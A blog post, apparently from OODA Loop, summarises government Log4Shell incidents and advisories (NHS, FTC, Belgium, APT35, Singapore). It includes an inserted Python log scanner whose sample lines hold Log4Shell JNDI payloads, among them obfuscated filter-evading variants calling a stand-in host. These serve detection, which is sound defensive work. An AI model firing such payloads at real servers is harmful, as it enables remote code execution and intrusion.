
Log4Shell Incidents and Mitigation Activities To-date: Governmental Agencies (Global)

For coverage of the recent press conference by CISA Director Jen Easterly and a general summary of U.S.-based Apache Log4j alerts and mitigation efforts (including the recent US-CERT and Carnegie Mellon Software Engineering Institute update of VU#930724 – Apache Log4j allows insecure JNDI lookups) see our previous post: Log4Shell Update from CISA Director Easterly and DHS CISA JCDC Company Updates.

Note: as we authored this post today, Check Point Research released the following: APT35 exploits Log4j vulnerability to distribute new modular PowerShell toolkit.

It is the most up-to-the-minute item included in the global Log4Shell incidents and mitigation activities summarized below.

Log4Shell Incidents and Mitigation Activities: Governmental Agencies (Global)

Source: UK NHS

United Kingdom (UK) National Health Service VMware Horizon Server Advisory

On January 5th, the UK’s National Health Service (NHS) released an advisory: Log4Shell Vulnerabilities in VMware Horizon Targeted to Install Web Shells. According to the UK NHS alert:

“An unknown threat group has been observed targeting VMware Horizon servers running versions affected by Log4Shell vulnerabilities in order to establish persistence within affected networks. The attack likely consists of a reconnaissance phase, where the attacker uses the Java Naming and Directory Interface (JNDI) via Log4Shell payloads to call back to malicious infrastructure. Once a weakness has been identified, the attack then uses the Lightweight Directory Access Protocol (LDAP) to retrieve and execute a malicious Java class file that injects a web shell into the VM Blast Secure Gateway service. The web shell can then be used by an attacker to carry out a number of malicious activities such as deploying additional malicious software, data exfiltration, or deployment of ransomware.”
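The reconnaissance phase the NHS describes leaves a recognisable trace: the JNDI lookup string carried in a request header or URL. As an added, defender-side example (not from the NHS advisory or from OODA), the following Python scans constructed web-server log lines for that string, first undoing the nested-lookup wrappers that Log4j resolves before the JNDI lookup runs, so that a simple substring match is not bypassed. Log lines, hostnames and the `Hit`/`scan` names are assumptions for the example.

```python
import re
from dataclasses import dataclass

# Constructed sample access-log lines (not from the advisory); ".invalid" hosts are placeholders.
SAMPLE_LOG = """\
10.0.0.5 - - [05/Jan/2022:10:01:02 +0000] "GET / HTTP/1.1" 200 512 "-" "Mozilla/5.0"
10.0.0.9 - - [05/Jan/2022:10:01:07 +0000] "GET /portal/ HTTP/1.1" 200 61 "-" "${jndi:ldap://callback.invalid:1389/a}"
10.0.0.9 - - [05/Jan/2022:10:01:09 +0000] "GET /portal/ HTTP/1.1" 200 61 "-" "${${lower:j}ndi:${lower:l}dap://callback.invalid/x}"
10.0.0.9 - - [05/Jan/2022:10:01:11 +0000] "GET /portal/ HTTP/1.1" 200 61 "-" "${${::-j}${::-n}${::-d}${::-i}:rmi://callback.invalid/y}"
10.0.0.7 - - [05/Jan/2022:10:02:00 +0000] "GET /docs/jndi-tutorial.html HTTP/1.1" 200 8192 "-" "curl/7.79"
"""

# Log4j evaluates inner lookups before the outer jndi: lookup, so a detector must
# reduce them the same way: ${lower:x} / ${upper:x} -> x, and the default-value
# form ${anything:-x} -> x. The loop repeats until no wrapper is left.
_WRAPPER = re.compile(r"\$\{(?:lower|upper):([^${}]*)\}", re.IGNORECASE)
_DEFAULT = re.compile(r"\$\{[^${}]*:-([^${}]*)\}")
# After normalisation, a JNDI lookup with one of the schemes Log4j 2.x can dispatch on.
_JNDI = re.compile(r"\$\{\s*jndi\s*:\s*(ldaps?|rmi|dns|iiop|corba|nds|http)\s*:", re.IGNORECASE)


def normalize(s: str) -> str:
    """Collapse nested lookup wrappers until the string stops changing."""
    prev = None
    while prev != s:
        prev = s
        s = _WRAPPER.sub(r"\1", s)
        s = _DEFAULT.sub(r"\1", s)
    return s


@dataclass
class Hit:
    line_no: int      # 1-based line in the log text
    scheme: str       # lookup scheme the payload would use (ldap, rmi, ...)
    normalized: str   # the log line after wrapper reduction, for the analyst


def scan(log_text: str) -> list[Hit]:
    """Return one Hit per log line that carries a JNDI lookup after normalisation."""
    hits = []
    for n, line in enumerate(log_text.splitlines(), start=1):
        norm = normalize(line)
        m = _JNDI.search(norm)
        if m:
            hits.append(Hit(n, m.group(1).lower(), norm))
    return hits


if __name__ == "__main__":
    for h in scan(SAMPLE_LOG):
        print(f"line {h.line_no}: jndi:{h.scheme} lookup -> {h.normalized}")
```

Line 5 is deliberately benign: a literal "jndi" in a URL path is not a lookup, and the detector only fires on the `${jndi:` form.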

Federal Trade Commission (FTC) Threatens Legal Action

In a press release on January 4th, the Federal Trade Commission announced that it “intends to use its full legal authority to pursue companies that fail to take reasonable steps to protect consumer data from exposure as a result of Log4j, or similar known vulnerabilities in the future.” This move by the FTC is consistent with the new types of corporate and governmental legal actions directed at cyber threats.

This would not be the first time that the FTC has used such legal activities to provide an incentive for companies to patch security vulnerabilities, as the Federal Trade Commission Act and the Gramm Leach Bliley Act allowed for the 2017 lawsuit against Equifax, “the US credit monitoring service that leaked the data of more than 147 million Americans after failing to patch an Apache Struts server…[in 2019], Equifax settled the FTC lawsuit and agreed to pay $700 million to affected consumers.” (1)

The Belgian Defense Ministry Attack

In a press conference yesterday, CISA Director Jen Easterly confirmed that CISA is aware of attacks impacting foreign government agencies, including the Belgian Defense Ministry. This Defense Ministry attack should not be confused with our recent coverage of the UK’s Defence Academy, which was hit by a cyberattack last year that caused significant damage, prompting the Academy to rebuild its network. This UK Defence Academy attack has not been attributed to the Apache Log4j vulnerability.

The Belgian Defense Ministry was attacked early in December when the discovery of the Log4j vulnerability was in its infancy.  The Defense Ministry confirmed the attack on December 16th.

Israeli Government Sites Targeted by Iranian APT Phosphorus

In the same time frame as the Belgian Defense Ministry attack, Check Point Software Technologies provided the Israeli government with evidence that Phosphorus (aka Charming Kitten or APT35), a group of Iranian hackers linked to the Iranian regime, “exploited the flaw in Log4j to carry out attacks against seven targets in Israel, including government sites.” We recently reported on the resurgence of Iranian hacking activity with the Log4Shell exploit used in a Cox Media Group (CMG) ransomware attack, which was attributed to Iranian APT Phosphorus as well.

Check Point Research just posted this breakdown of Phosphorus’ efforts to exploit the Log4j vulnerability to distribute a new modular PowerShell toolkit.

Source: Check Point Research

Also of interest from a recent Check Point report: “[As early as Friday, December 10th], Check Point has tracked down and stopped more than 1.8 million attempts to exploit the Log4j vulnerability around the world. The company has identified the attacks in close to half, 46 percent, of the corporate networks in the world – and in more than half, 54 percent, of the corporate networks in Israel – although the number of actual attacks is probably higher.”

Singapore’s Cyber Security Agency (CSA) held Emergency Meetings with Critical Information Infrastructure (CII) sectors

Singapore has progressively bolstered its cybersecurity efforts in the last few years, through the creation of the Defence Cyber Organisation (DCO) in 2017 and, in 2015, standing up Singapore’s Cyber Security Agency (CSA), a new government agency to oversee Singapore’s cybersecurity operations.

During the early onset of the Log4j threat, at the same time in mid-December that CISA ordered federal civilian agencies to patch the Log4j vulnerability and 12 others by December 24, 2021, according to ZDNet the Singapore CSA held “emergency meetings with critical information infrastructure (CII) sectors to prepare them for potential threats stemming from the Log4j vulnerability. The CSA also sent out an alert warning that the critical vulnerability, when exploited successfully, could allow attackers to gain full control of affected servers. It noted that there was only a short window to deploy mitigation measures and organizations should do so quickly.”

Further Resources

Log4Shell Update from CISA Director Easterly and DHS CISA JCDC Company Updates

OODA Loop – 2021 Year-End Review: Cybersecurity

Log4Shell Exploit Used in Cox Media Group Ransomware Attack Attributed to Iranian Hackers

CISA Apache Log4j Vulnerability Guidance Webpage Up and Running with Mitigation Guidance from JCDC Partners

Related Reading:

Cybersecurity Sensemaking: Strategic intelligence to inform your decisionmaking

The OODA leadership and analysts have decades of experience in understanding and mitigating cybersecurity threats and apply this real-world practitioner knowledge in our research and reporting. This page on the site is a repository of the best of our actionable research as well as a news stream of our daily reporting on cybersecurity threats and mitigation measures. See: Cybersecurity Sensemaking

Daniel Pereira

Daniel Pereira is research director at OODA. He is a foresight strategist, creative technologist, and an information communication technology (ICT) and digital media researcher with 20+ years of experience directing public/private partnerships and strategic innovation initiatives.